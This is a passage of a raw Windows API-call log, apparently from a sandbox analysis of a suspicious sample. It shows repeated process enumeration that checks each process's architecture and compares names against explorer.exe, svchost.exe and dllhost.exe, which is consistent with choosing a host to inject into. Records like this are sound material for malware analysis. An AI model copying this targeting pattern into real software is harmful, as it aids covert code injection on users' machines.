th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0189.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0189.452] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0189.453] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0189.453] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0189.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0189.454] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.454] CloseHandle (hObject=0xd8) returned 1 [0189.454] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0189.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0189.455] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.455] CloseHandle (hObject=0xd8) returned 1 [0189.455] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0189.455] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0189.455] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0189.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0189.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0189.456] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.456] CloseHandle (hObject=0xd8) returned 1 [0189.456] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0189.457] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.457] CloseHandle (hObject=0xd8) returned 1 [0189.457] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0189.457] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0189.457] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.457] CloseHandle (hObject=0xd8) returned 1 [0189.457] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.458] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0189.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0189.458] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.458] CloseHandle (hObject=0xd8) returned 1 [0189.458] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0189.459] CloseHandle (hObject=0xd4) returned 1 [0189.459] Sleep (dwMilliseconds=0x3e8) [0190.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0190.519] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0190.519] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0190.520] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0190.520] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0190.521] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0190.521] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0190.522] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0190.522] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0190.523] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0190.523] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0190.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0190.524] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0190.524] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0190.525] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0190.525] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0190.526] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0190.526] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0190.527] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0190.527] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0190.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0190.528] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.528] CloseHandle (hObject=0xd8) returned 1 [0190.528] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0190.528] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0190.528] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0190.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0190.529] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0190.529] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.529] CloseHandle (hObject=0xd8) returned 1 [0190.530] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0190.530] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0190.530] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0190.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0190.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0190.531] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0190.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0190.531] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.532] CloseHandle (hObject=0xd8) returned 1 [0190.532] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0190.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0190.533] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.533] CloseHandle (hObject=0xd8) returned 1 [0190.533] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0190.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0190.533] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.533] CloseHandle (hObject=0xd8) returned 1 [0190.533] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0190.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0190.534] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.534] CloseHandle (hObject=0xd8) returned 1 [0190.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0190.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0190.534] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.534] CloseHandle (hObject=0xd8) returned 1 [0190.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0190.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0190.535] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.535] CloseHandle (hObject=0xd8) returned 1 [0190.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0190.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0190.536] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.536] CloseHandle (hObject=0xd8) returned 1 [0190.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0190.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0190.536] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.536] CloseHandle (hObject=0xd8) returned 1 [0190.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0190.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0190.537] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.537] CloseHandle (hObject=0xd8) returned 1 [0190.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0190.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0190.537] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.537] CloseHandle (hObject=0xd8) returned 1 [0190.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0190.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0190.538] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.538] CloseHandle (hObject=0xd8) returned 1 [0190.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0190.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0190.538] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.539] CloseHandle (hObject=0xd8) returned 1 [0190.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0190.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0190.539] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.539] CloseHandle (hObject=0xd8) returned 1 [0190.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0190.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0190.540] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.540] CloseHandle (hObject=0xd8) returned 1 [0190.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0190.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0190.540] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.540] CloseHandle (hObject=0xd8) returned 1 [0190.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0190.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0190.541] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.541] CloseHandle (hObject=0xd8) returned 1 [0190.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0190.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0190.541] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.541] CloseHandle 